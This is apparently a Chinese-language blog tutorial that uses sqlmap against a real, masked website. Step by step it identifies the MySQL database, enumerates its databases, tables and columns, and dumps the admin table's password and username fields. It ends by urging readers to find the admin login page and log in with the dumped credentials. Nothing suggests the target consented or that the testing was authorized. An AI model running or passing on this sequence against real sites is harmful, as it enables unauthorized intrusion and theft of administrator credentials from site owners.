1. 确定是什么数据库
sqlmap -u "http://********/about.php?id=5"
参数:
-u: 指定注入点url
结果:
如图所示: 数据库是 MySQL
2. 查看当前站点有那些数据库
sqlmap -u "http://*********/about.php?id=5" --dbs
参数:
–dbs: dbs前面有两条杠,请看清楚。
结果:
如图所示: 有 dbracpro28 和 information_schema两个数据库
3. 查看dbracpro28数据库中有那些数据表
sqlmap -u "http://*********/about.php?id=5" --tables -D "dbracpro28"
参数:
–tables: 列出表
-D: 指定具体数据库
结果:
如图所示: dbracpro28 数据看有 34 个表
4. 查看 dbracpro28数据库中的admin表中有那些数据段
sqlmap -u "http://*********/about.php?id=5" --columns -T "admin" -D "dbracpro28"
参数:
–columns: 列出字段
-D: 指定具体数据库
-T: 指定表
结果:
如图所示: admin 表中有以上 4 个字段
5. 查看 dbracpro28数据库中的admin表中pwd和usernc 里那些值
sqlmap -u "http://*********/about.php?id=5" --dump -C "pwd, usernc" -T "admin" -D "dbracpro28"
参数:
–dump: 将结果导出
-D: 指定具体数据库
-T: 指定表
-C: 指定字段
结果:
如图所示: userna, 和 pwd 就被我们扫出来啦~ 然后找到后台, 用它们愉快的登陆吧~~~ :)